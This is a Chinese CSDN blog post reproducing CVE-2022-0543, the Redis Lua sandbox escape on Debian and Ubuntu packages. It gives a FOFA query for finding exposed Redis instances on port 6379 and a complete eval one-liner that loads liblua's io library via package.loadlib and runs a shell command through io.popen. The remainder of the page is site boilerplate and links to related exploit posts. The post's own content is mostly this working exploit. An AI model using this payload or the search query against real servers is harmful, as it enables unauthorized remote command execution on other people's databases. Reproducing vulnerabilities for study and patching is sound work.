Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

已于 2023-11-25 22:49:56 修改
阅读量596 收藏
点赞数
分类专栏: 网络安全 文章标签: 数据库安全
于 2023-11-25 22:27:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/134621537
版权

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。–那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描

fofa语法搜索:port=“6379” && protocol=“redis”

用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​image​​

梧六柒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lua-resty-redis-connector:lua-resty-redis的连接实用程序
02-03
lua-resty-redis-connector:lua-resty-redis的连接实用程序
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
最新发布
XZ_______的博客
04-21 833
漏洞复现
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
resty-redis-cluster:Redis集群的Openresty lua客户端
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
Redis Lua沙盒绕过命令执行CVE-2022-0543
qq_50854662的博客
04-14 606
Redis Lua沙盒绕过命令执行CVE-2022-0543
CVE-2022-0543Redis Lua沙盒绕过命令执行复现
网安君的博客
03-16 6070
0x00 漏洞简介 Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本1的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 参考链接: https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://bugs.debian.org/cgi-bin/
lua-resty-redis-connector-master
04-11
lua-resty-redis-connector-master lua-resty的redislua-resty的redis
redis-lua-scaling-bloom-filter:用于缩放布隆过滤器的LUA Redis脚本
02-03
redis-lua-scaling-bloom-filter add.lua , cas.lua和check.lua是用于的三个lua脚本layer-add.lua和later-check.lua是用于的两个lua脚本这些脚本将在Redis中使用命令执行。 这些脚本可能无法在Redis集群上运行,...
CVE-2022-0543redis沙盒逃逸)
huayimy的博客
02-03 857
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3521
CVE-2022-0543 Redis沙盒逃逸漏洞
Linux环境加密lua脚本,Wireshark Lua脚本文件任意代码执行漏洞
weixin_39621860的博客
05-11 113
发布日期:2011-07-30更新日期:2011-09-08受影响系统:Wireshark Wireshark 1.6.xWireshark Wireshark 1.4.x不受影响系统:Wireshark Wireshark 1.6.2Wireshark Wireshark 1.4.9描述:------------------------------------------------------...
redis漏洞修复CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
大新新大浩浩的博客
09-20 862
redis漏洞修复CVE-2022-35977、CVE-2023-22458、CVE-2023-28856
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1826
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 490
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
redis lua沙盒绕过
08-14
- *2* [【CVE-2022-0543Redis Lua沙盒绕过命令执行复现](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值